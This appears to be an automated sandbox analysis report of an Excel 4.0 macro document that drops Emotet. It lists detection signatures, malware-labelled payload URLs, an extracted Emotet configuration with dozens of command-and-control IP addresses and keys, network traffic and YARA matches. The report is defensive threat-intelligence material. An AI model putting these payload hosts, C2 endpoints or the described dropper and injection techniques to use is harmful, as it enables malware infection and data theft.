Windows Analysis Report
imedpub.com_10.xls

Overview

General Information

Sample Name:	imedpub.com_10.xls
Analysis ID:	562396
MD5:	b7d1edc6031adb3dfb8b7a4489da9102
SHA1:	fbb0c3649b1741de48c037cea19f088acad5c6a6
SHA256:	6a9dd96ee5aeaedd9045f2bd76b3bd8d7f7b42cc37c46ad076791e33b1bb2fdc
Tags:	SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Found malicious Excel 4.0 Macro

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Emotet

Multi AV Scanner detection for domain / URL

Sigma detected: Windows Shell File Write to Suspicious Folder

Document contains OLE streams with names of living off the land binaries

Powershell drops PE file

Sigma detected: MSHTA Spawning Windows Shell

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Sigma detected: Suspicious MSHTA Process Patterns

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Suspicious PowerShell Command Line

Found Excel 4.0 Macro with suspicious formulas

Machine Learning detection for dropped file

Sigma detected: Mshta Spawning Windows Shell

C2 URLs / IPs found in malware configuration

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Uses insecure TLS / SSL version for HTTPS connection

Document misses a certain OLE stream usually present in this Microsoft Office document type

Abnormal high CPU Usage

Found a hidden Excel 4.0 Macro sheet

Potential document exploit detected (unknown TCP traffic)

Searches for the Microsoft Outlook file path

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to delete services

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Stores large binary data to the registry

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Potential document exploit detected (performs DNS queries)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Searches for user specific document files

Enables debug privileges

PE file contains an invalid checksum

Yara detected Xls With Macro 4.0

Connects to several IPs in different countries

Contains functionality to detect virtual machines (SLDT)

Potential key logger detected (key state polling based)

Creates a window with clipboard capturing capabilities

Document contains embedded VBA macros

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Potential document exploit detected (performs HTTP gets)

Classification

Signatures

AV Detection

Antivirus detection for URL or domain

Source: https://www.yeald.finance/wp-adm	Avira URL Cloud: Label: malware
Source: https://palankhir.hu/tools/GJRNh	Avira URL Cloud: Label: malware
Source: https://palankhir.hu/tools/GJRNhZHz/	Avira URL Cloud: Label: malware
Source: http://tattooblog.cn/wp-includes/KJLv/PE3	Avira URL Cloud: Label: malware
Source: https://weddingbandsirelandjbk.com/hgsynt2/o/	Avira URL Cloud: Label: malware
Source: https://umanostudio.com/wp-admin	Avira URL Cloud: Label: malware
Source: http://tattooblog.cn/wp-includes/KJLv/	Avira URL Cloud: Label: malware
Source: http://masboni.com/wp-admin/3zUQl/PE3	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.htmlo	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.htmlfunction	Avira URL Cloud: Label: malware
Source: http://starspeedng.com/One-File/	Avira URL Cloud: Label: malware
Source: http://starspeedng.com/One-File/U3Trml/	Avira URL Cloud: Label: phishing
Source: https://getcode.info/wp-content/	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.html6	Avira URL Cloud: Label: malware
Source: https://falah.org.pk/vegasvulkan1000.falah.org.pk/ZBRx4QuUXfLH/PE3	Avira URL Cloud: Label: malware
Source: http://sneakadream.com/wp-conten	Avira URL Cloud: Label: phishing
Source: https://tanquessepticos.com/wp-a	Avira URL Cloud: Label: malware
Source: http://sneakadream.com/wp-content/pccmAOq/	Avira URL Cloud: Label: malware
Source: https://www.yeald.finance	Avira URL Cloud: Label: malware
Source: https://www.yeald.finance/wp-admin/1WgPRm/PE3	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.htmlB	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.htmlhttp://91.240.118.168/zzx/ccv/fe.html	Avira URL Cloud: Label: malware
Source: http://tattooblog.cn/wp-includes	Avira URL Cloud: Label: malware
Source: https://umanostudio.com/wp-admin/n1LG7aJnptBlQkC/	Avira URL Cloud: Label: malware
Source: https://www.yeald.finance/wp-admin/1WgPRm/	Avira URL Cloud: Label: malware
Source: https://allaagency.ro/wp-admin/7	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.html	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.htmlWinSta0	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.htmlC:	Avira URL Cloud: Label: malware
Source: https://chochungcuhanoi.com/wp-c	Avira URL Cloud: Label: malware
Source: https://chochungcuhanoi.com/wp-content/cyE2u0cnolP/PE3	Avira URL Cloud: Label: malware
Source: https://palankhir.hu/tools/GJRNhZHz/PE3	Avira URL Cloud: Label: malware
Source: http://masboni.com/wp-admin/3zUQl/	Avira URL Cloud: Label: malware
Source: https://falah.org.pk/vegasvulkan	Avira URL Cloud: Label: phishing
Source: https://umanostudio.com/wp-admin/n1LG7aJnptBlQkC/PE3	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe	Avira URL Cloud: Label: malware
Source: https://chochungcuhanoi.com/wp-content/cyE2u0cnolP/	Avira URL Cloud: Label: malware
Source: https://weddingbandsirelandjbk.com/hgsynt2/o/PE3	Avira URL Cloud: Label: malware
Source: https://falah.org.pk/vegasvulkan1000.falah.org.pk/ZBRx4QuUXfLH/	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.htmlmshta	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.htmlsE	Avira URL Cloud: Label: malware
Source: https://tanquessepticos.com/wp-admin/ApVVbl1fQ0/PE3	Avira URL Cloud: Label: malware
Source: http://sneakadream.com/wp-content/pccmAOq/PE3	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.pngPE3	Avira URL Cloud: Label: malware
Source: https://tanquessepticos.com/wp-admin/ApVVbl1fQ0/	Avira URL Cloud: Label: malware
Source: http://starspeedng.com/One-File/U3Trml/PE3	Avira URL Cloud: Label: phishing
Source: https://getcode.info/wp-content/QDx8b5j/	Avira URL Cloud: Label: malware
Source: http://91.240.118.168	URL Reputation: Label: malware
Source: https://allaagency.ro/wp-admin/7/PE3	Avira URL Cloud: Label: malware
Source: https://getcode.info/wp-content/QDx8b5j/PE3	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.htmlv1.0YA	Avira URL Cloud: Label: malware
Source: http://masboni.com/wp-admin/3zUQ	Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zzx/ccv/fe.png	Avira URL Cloud: Label: malware
Source: https://allaagency.ro/wp-admin/7/	Avira URL Cloud: Label: malware

Found malware configuration

Source: 15.2.rundll32.exe.300000.2.raw.unpack

Malware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Multi AV Scanner detection for submitted file

Source: imedpub.com_10.xls

ReversingLabs: Detection: 30%

Multi AV Scanner detection for domain / URL

Source: www.yeald.finance	Virustotal: Detection: 8%			Perma Link
Source: https://palankhir.hu/tools/GJRNhZHz/	Virustotal: Detection: 11%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\Public\Documents\ssd.dll

Joe Sandbox ML: detected

Compliance

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 94.130.116.76:443 -> 192.168.2.22:49167 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,	9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,	11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_002D7E00 FindFirstFileW,	15_2_002D7E00

Source: Malware configuration extractor	IPs: 160.16.102.168:80
Source: Malware configuration extractor	IPs: 131.100.24.231:80
Source: Malware configuration extractor	IPs: 200.17.134.35:7080
Source: Malware configuration extractor	IPs: 207.38.84.195:8080
Source: Malware configuration extractor	IPs: 212.237.56.116:7080
Source: Malware configuration extractor	IPs: 58.227.42.236:80
Source: Malware configuration extractor	IPs: 104.251.214.46:8080
Source: Malware configuration extractor	IPs: 158.69.222.101:443
Source: Malware configuration extractor	IPs: 192.254.71.210:443
Source: Malware configuration extractor	IPs: 46.55.222.11:443
Source: Malware configuration extractor	IPs: 45.118.135.203:7080
Source: Malware configuration extractor	IPs: 107.182.225.142:8080
Source: Malware configuration extractor	IPs: 103.75.201.2:443
Source: Malware configuration extractor	IPs: 104.168.155.129:8080
Source: Malware configuration extractor	IPs: 195.154.133.20:443
Source: Malware configuration extractor	IPs: 159.8.59.82:8080
Source: Malware configuration extractor	IPs: 110.232.117.186:8080
Source: Malware configuration extractor	IPs: 45.142.114.231:8080
Source: Malware configuration extractor	IPs: 41.76.108.46:8080
Source: Malware configuration extractor	IPs: 203.114.109.124:443
Source: Malware configuration extractor	IPs: 50.116.54.215:443
Source: Malware configuration extractor	IPs: 209.59.138.75:7080
Source: Malware configuration extractor	IPs: 185.157.82.211:8080
Source: Malware configuration extractor	IPs: 164.68.99.3:8080
Source: Malware configuration extractor	IPs: 162.214.50.39:7080
Source: Malware configuration extractor	IPs: 138.185.72.26:8080
Source: Malware configuration extractor	IPs: 178.63.25.185:443
Source: Malware configuration extractor	IPs: 51.15.4.22:443
Source: Malware configuration extractor	IPs: 81.0.236.90:443
Source: Malware configuration extractor	IPs: 216.158.226.206:443
Source: Malware configuration extractor	IPs: 45.176.232.124:443
Source: Malware configuration extractor	IPs: 162.243.175.63:443
Source: Malware configuration extractor	IPs: 212.237.17.99:8080
Source: Malware configuration extractor	IPs: 45.118.115.99:8080
Source: Malware configuration extractor	IPs: 129.232.188.93:443
Source: Malware configuration extractor	IPs: 173.214.173.220:8080
Source: Malware configuration extractor	IPs: 178.79.147.66:8080
Source: Malware configuration extractor	IPs: 176.104.106.96:8080
Source: Malware configuration extractor	IPs: 51.38.71.0:443
Source: Malware configuration extractor	IPs: 173.212.193.249:8080
Source: Malware configuration extractor	IPs: 217.182.143.207:443
Source: Malware configuration extractor	IPs: 212.24.98.99:8080
Source: Malware configuration extractor	IPs: 159.89.230.105:443
Source: Malware configuration extractor	IPs: 79.172.212.216:8080
Source: Malware configuration extractor	IPs: 212.237.5.209:443

Source: global traffic	HTTP traffic detected: GET /wp-admin/1WgPRm/ HTTP/1.1Host: www.yeald.financeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /zzx/ccv/fe.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: OnlineSASFR OnlineSASFR

Source: Joe Sandbox View	IP Address: 94.130.116.76 94.130.116.76
Source: Joe Sandbox View	IP Address: 195.154.133.20 195.154.133.20

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: unknown	TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown	TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown	TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown	TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown	TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown	TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown	TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown	TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown	TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown	TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.168

Source: mshta.exe, 00000004.00000002.433720521.0000000003130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000002.433720521.0000000003130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: powershell.exe, 00000006.00000002.672134847.000000000029F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,		9_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,		11_2_1001B43F

Source: Yara match	File source: 12.2.rundll32.exe.9c0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2f90000.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.a20000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2b60000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2b60000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.7e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3660000.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2790000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.760000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.22b0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.300000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.bf0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.c20000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.c60000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2dc0000.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.25c0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2410000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2730000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2790000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2850000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2730000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2d80000.19.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.3d0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.23a0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2c60000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2b90000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2760000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.24f0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2370000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2aa0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3690000.29.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2340000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2f50000.24.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3660000.28.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.25c0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.9f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2f20000.23.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2aa0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2d50000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2eb0000.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2820000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2f90000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.bc0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2f90000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.bc0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.910000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.900000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.9f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2c60000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.870000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.c20000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2e90000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2410000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2f10000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2f50000.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.22b0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.900000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2d20000.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2eb0000.22.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.790000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.3d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2ad0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.330000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.bf0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2880000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2ff0000.27.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2ad0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2e40000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.cf0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2dc0000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2d20000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2850000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.25f0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2fc0000.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.c60000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.bc0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.870000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2cf0000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.bc0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.538615152.0000000002850000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.496653771.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.494317741.0000000002F11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.673473149.0000000002FC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.672675374.0000000000CF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.493631688.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.672831223.0000000002881000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.541336124.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.493871437.0000000000BF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.673078532.0000000002CF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.496375881.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.541752522.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.672794567.0000000002790000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.672749382.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.493984139.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.672982289.0000000002B91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.672961471.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.494455991.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.538520592.0000000000BF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
